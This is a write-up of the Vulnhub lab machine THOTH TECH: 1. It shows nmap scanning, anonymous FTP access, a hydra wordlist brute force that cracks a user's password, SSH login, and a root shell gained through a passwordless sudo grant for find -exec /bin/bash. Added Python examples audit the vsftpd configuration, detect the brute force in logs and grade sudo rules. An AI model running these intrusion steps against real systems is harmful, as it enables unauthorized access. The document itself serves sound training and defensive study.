Vulnhub: THOTH TECH: 1
2021-08-24 22:02:27
1. Locate the target:
A scan of the local subnet for open ports identifies the target as 192.168.1.105.
┌──(kali㉿kali)-[~]
└─$ nmap 192.168.1.1/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-24 20:23 CST
Nmap scan report for 192.168.1.1
Host is up (0.0019s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
53/tcp filtered domain
80/tcp open http
1900/tcp open upnp
Nmap scan report for 192.168.1.104
Host is up (0.0070s latency).
All 1000 scanned ports on 192.168.1.104 are closed
Nmap scan report for 192.168.1.105
Host is up (0.00038s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap scan report for 192.168.1.106
Host is up (0.00047s latency).
All 1000 scanned ports on 192.168.1.106 are closed
Nmap scan report for 192.168.1.108
Host is up (0.0057s latency).
All 1000 scanned ports on 192.168.1.108 are closed
Nmap scan report for 192.168.1.252
Host is up (0.0095s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
1900/tcp open upnp
Nmap done: 256 IP addresses (6 hosts up) scanned in 7.30 seconds
2. Scan and analyse the target
┌──(kali㉿kali)-[~]
└─$ nmap -sC -A 192.168.1.105
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-24 21:32 CST
Nmap scan report for 192.168.1.105
Host is up (0.00039s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 110 Jul 02 09:33 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.106
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ac:d2:7b:75:80:67:f2:9d:95:67:52:99:c8:2f:ab:7b (RSA)
| 256 78:ca:86:73:b6:87:06:08:eb:7a:9c:ab:cf:9d:89:16 (ECDSA)
| 256 93:49:d7:8c:1c:07:7e:8e:79:91:2b:bf:2d:0d:34:6b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.40 seconds
3. Examine the FTP service
The service scan shows that the FTP server allows anonymous login and that it holds a file named note.txt.
Log in to the FTP server, download the file and read it.
The note reveals an FTP user named pwnlab whose password is weak.
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.1.105
Connected to 192.168.1.105.
220 (vsFTPd 3.0.3)
Name (192.168.1.105:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 65534 65534 4096 Jul 02 09:33 .
drwxr-xr-x 2 65534 65534 4096 Jul 02 09:33 ..
-rw-r--r-- 1 0 0 110 Jul 02 09:33 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (110 bytes).
226 Transfer complete.
110 bytes received in 0.00 secs (2.9140 MB/s)
ftp> exit
221 Goodbye.
┌──(kali㉿kali)-[~]
└─$ cat note.txt
Dear pwnlab,
My name is jake. Your password is very weak and easily crackable, I think change your password.
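Two settings made this step possible: anonymous login was enabled, and the FTP service was plain text. The following added example (not code from the original post or from the vsftpd project) audits a vsftpd.conf against a small hardening baseline and shows the weak configuration beside the corrected one. The directive names and their compiled-in defaults come from vsftpd.conf(5); the baseline values, the reasons and both sample configs are constructed for this example, and the certificate path is a placeholder.

```python
"""Audit vsftpd.conf against a hardening baseline (added example, not from the post)."""

# Compiled-in defaults for the directives we check, per vsftpd.conf(5).
# A directive that is absent from the file takes this value.
COMPILED_DEFAULTS = {
    "anonymous_enable": "YES",
    "ssl_enable": "NO",
    "max_login_fails": "3",
    "xferlog_enable": "NO",
    "log_ftp_protocol": "NO",
}

# Hardened value and why it matters on a box like this one (constructed baseline).
BASELINE = {
    "anonymous_enable": ("NO", "anonymous login exposed note.txt to anyone on the LAN"),
    "ssl_enable": ("YES", "control and data channels were plain text, so the guessed password crossed the wire in clear"),
    "max_login_fails": ("3", "failed attempts allowed per connection before vsftpd drops it; lower is stricter"),
    "xferlog_enable": ("YES", "without a log the brute-force run leaves no trace on the server"),
    "log_ftp_protocol": ("YES", "records the FAIL LOGIN / OK LOGIN lines a detector needs"),
}

# Constructed: roughly the state that let an anonymous client read note.txt.
WEAK_CONF = """\
listen=NO
listen_ipv6=YES
anonymous_enable=YES
local_enable=YES
write_enable=NO
max_login_fails=50
"""

# Constructed: same service with the baseline applied.
HARDENED_CONF = """\
listen=NO
listen_ipv6=YES
anonymous_enable=NO
local_enable=YES
write_enable=NO
ssl_enable=YES
# placeholder path, not from the original page
rsa_cert_file=/etc/ssl/certs/vsftpd.pem
xferlog_enable=YES
log_ftp_protocol=YES
"""


def parse_vsftpd_conf(text):
    """Parse key=value lines; blank lines and # comments are skipped, last value wins."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings


def effective(settings, key):
    """Value actually in force: explicit setting, else the compiled-in default."""
    return settings.get(key, COMPILED_DEFAULTS.get(key))


def audit(conf_text):
    """Return one finding dict per baseline directive that is not at its hardened value."""
    settings = parse_vsftpd_conf(conf_text)
    findings = []
    for key, (expected, reason) in BASELINE.items():
        observed = effective(settings, key)
        if observed.isdigit() and expected.isdigit():
            ok = int(observed) <= int(expected)   # numeric limits: stricter than baseline is fine
        else:
            ok = observed.upper() == expected.upper()
        if not ok:
            findings.append({"directive": key, "observed": observed,
                             "expected": expected, "reason": reason})
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {name} ==")
        for f in audit(conf):
            print(f"  {f['directive']}={f['observed']} (want {f['expected']}): {f['reason']}")
```

Run against the weak config it reports all five directives; against the hardened config it reports nothing. Directives left out of the file are judged by their compiled-in default, which is what catches the missing ssl_enable and logging lines.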
4. Password brute force
Use hydra to crack the login password of user pwnlab.
The password of pwnlab is found to be babygirl1.
┌──(kali㉿kali)-[~]
└─$ hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt 192.168.1.105 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-24 21:47:33
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.1.105:21/
[21][ftp] host: 192.168.1.105 login: pwnlab password: babygirl1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-24 21:48:31
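Hydra ran 16 parallel tasks against the FTP service, so the server-side signal is a dense burst of FAIL LOGIN lines from one client followed by an OK LOGIN for the same user. The following added example (not from the original post) implements that detection over constructed vsftpd.log lines: a sliding window of failures per client IP raises a burst alert, and a later successful login from a flagged IP is reported as a probable credential compromise. The log lines follow the vsftpd.log layout written when log_ftp_protocol is on; the timestamps, PIDs and the second client are constructed, and the thresholds are this example's own.

```python
"""Detect FTP password guessing in vsftpd.log lines (added example, not from the post)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# vsftpd.log line, e.g.:
#   Tue Aug 24 21:47:33 2021 [pid 2201] [pwnlab] FAIL LOGIN: Client "192.168.1.106"
# CONNECT lines carry no [user] field, hence the optional group.
LOG_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>[^\]]*)\] )?(?P<event>FAIL LOGIN|OK LOGIN|CONNECT): Client "(?P<ip>[^"]+)"'
)

# Constructed sample: one anonymous login, one stray failure from another host,
# then twelve failures in twelve seconds for pwnlab and the eventual success.
SAMPLE_LOG = [
    'Tue Aug 24 21:40:02 2021 [pid 2190] CONNECT: Client "192.168.1.106"',
    'Tue Aug 24 21:40:03 2021 [pid 2189] [ftp] OK LOGIN: Client "192.168.1.106"',
    'Tue Aug 24 21:45:10 2021 [pid 2195] [alice] FAIL LOGIN: Client "192.168.1.50"',
] + [
    f'Tue Aug 24 21:47:{33 + i:02d} 2021 [pid {2200 + i}] [pwnlab] FAIL LOGIN: Client "192.168.1.106"'
    for i in range(12)
] + [
    'Tue Aug 24 21:48:31 2021 [pid 2300] [pwnlab] OK LOGIN: Client "192.168.1.106"',
]


def parse_line(line):
    """Return {'ts','user','event','ip'} for a recognised line, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(" ".join(m["ts"].split()), "%a %b %d %H:%M:%S %Y")
    return {"ts": ts, "user": m["user"], "event": m["event"], "ip": m["ip"]}


def detect_bruteforce(lines, threshold=10, window_seconds=60):
    """Alert on >= threshold FAIL LOGIN from one IP inside window_seconds,
    and on any OK LOGIN from an IP that has already been flagged."""
    failures = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    flagged = {}                    # ip -> time the burst alert fired
    alerts = []
    window = timedelta(seconds=window_seconds)
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        if ev["event"] == "FAIL LOGIN":
            q = failures[ip]
            q.append(ts)
            while q and ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged[ip] = ts
                alerts.append({"kind": "burst", "ip": ip, "user": ev["user"],
                               "failures": len(q), "at": ts})
        elif ev["event"] == "OK LOGIN" and ip in flagged:
            alerts.append({"kind": "success_after_burst", "ip": ip,
                           "user": ev["user"], "at": ts})
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG):
        print(a)
```

On the sample the burst fires at the tenth failure from 192.168.1.106 and the OK LOGIN for pwnlab 47 seconds later is reported as success_after_burst; the single failure from the other host never reaches the threshold. The same two events are what a fail2ban jail on the vsftpd log would key on, with the second one being the reason to reset the account's password rather than just block the source.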
5. Log in to the server
Log in to the server as pwnlab.
┌──(kali㉿kali)-[~]
└─$ ssh pwnlab@192.168.1.105
pwnlab@192.168.1.105's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
- Documentation: https://help.ubuntu.com
- Management: https://landscape.canonical.com
- Support: https://ubuntu.com/advantage
System information as of Tue 24 Aug 2021 01:49:55 PM UTC
System load: 0.0 Processes: 149
Usage of /: 25.0% of 19.56GB Users logged in: 0
Memory usage: 22% IPv4 address for enp0s3: 192.168.1.105
Swap usage: 0%
Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
66 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Aug 24 07:44:49 2021 from 192.168.1.106
pwnlab@thothtech:~$
pwnlab@thothtech:~$ whoami
pwnlab
6. Check user privileges and escalate
Running sudo -l shows that user pwnlab may run the program find as root, and this is used to obtain root privileges.
pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwnlab may run the following commands on thothtech:
(root) NOPASSWD: /usr/bin/find
pwnlab@thothtech:~$ sudo /usr/bin/find . -exec /bin/bash \; -quit
root@thothtech:/home/pwnlab# whoami
root
root@thothtech:/home/pwnlab#
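The sudo -l output above is exactly what a least-privilege audit should catch before an attacker does: a passwordless root grant for a binary whose own options launch other programs. The following added example (not from the original post) parses sudo -l output in that format and grades each rule. The seed list of command-running binaries contains only find, the binary used on this box; the severity labels and the extra sample rules are this example's own.

```python
"""Grade sudo -l output for risky root grants (added example, not from the post)."""
import posixpath
import re

# One rule line as sudo -l prints it, e.g. "(root) NOPASSWD: /usr/bin/find"
# or "(ALL : ALL) ALL". Tags such as NOPASSWD: / SETENV: may precede the commands.
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# Binaries whose documented options run other programs (find -exec on this box).
# Seed list for this example; extend it for your own estate.
COMMAND_RUNNERS = {"find"}

# The sudo -l output from the writeup.
SAMPLE_OUTPUT = """\
Matching Defaults entries for pwnlab on thothtech:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User pwnlab may run the following commands on thothtech:
    (root) NOPASSWD: /usr/bin/find
"""


def parse_sudo_l(output):
    """Return a list of {'runas','tags','cmds'} for the rule lines that follow
    the 'may run the following commands' header."""
    rules, in_rules = [], False
    for raw in output.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m["runas"].split(":")[0].strip()          # "(ALL : ALL)" -> "ALL"
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        cmds = [c.strip() for c in m["cmds"].split(",")]
        rules.append({"runas": runas, "tags": tags, "cmds": cmds})
    return rules


def audit_sudo_rules(rules):
    """Return (severity, command, detail) for every rule that runs as root."""
    findings = []
    for rule in rules:
        if rule["runas"] not in ("root", "ALL"):
            continue                                      # only root paths matter here
        nopasswd = "NOPASSWD" in rule["tags"]
        for cmd in rule["cmds"]:
            binary = posixpath.basename(cmd.split()[0])
            if cmd == "ALL":
                findings.append(("critical", cmd, "unrestricted root"))
            elif binary in COMMAND_RUNNERS:
                detail = f"{binary} can launch other programs as root"
                if nopasswd:
                    detail += " with no password"
                findings.append(("critical" if nopasswd else "high", cmd, detail))
            elif nopasswd:
                findings.append(("medium", cmd,
                                 "passwordless root command; confirm it cannot spawn a shell or write root-owned files"))
            else:
                findings.append(("low", cmd, "root command behind a password; keep under review"))
    return findings


if __name__ == "__main__":
    for sev, cmd, detail in audit_sudo_rules(parse_sudo_l(SAMPLE_OUTPUT)):
        print(f"[{sev}] {cmd}: {detail}")
```

On the writeup's output this yields a single critical finding for /usr/bin/find. The remediation is to drop the rule, or to replace the general-purpose binary with a fixed-argument wrapper script owned by root, so that sudo grants one task rather than a program that can run anything.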
7. Obtain the flag.
root@thothtech:/home/pwnlab# cd /root
root@thothtech:~# ls
root.txt snap
root@thothtech:~# cat root.txt
Root flag: d51546d5bcf8e3856c7bff5d201f0df6
good job 😃
root@thothtech:~#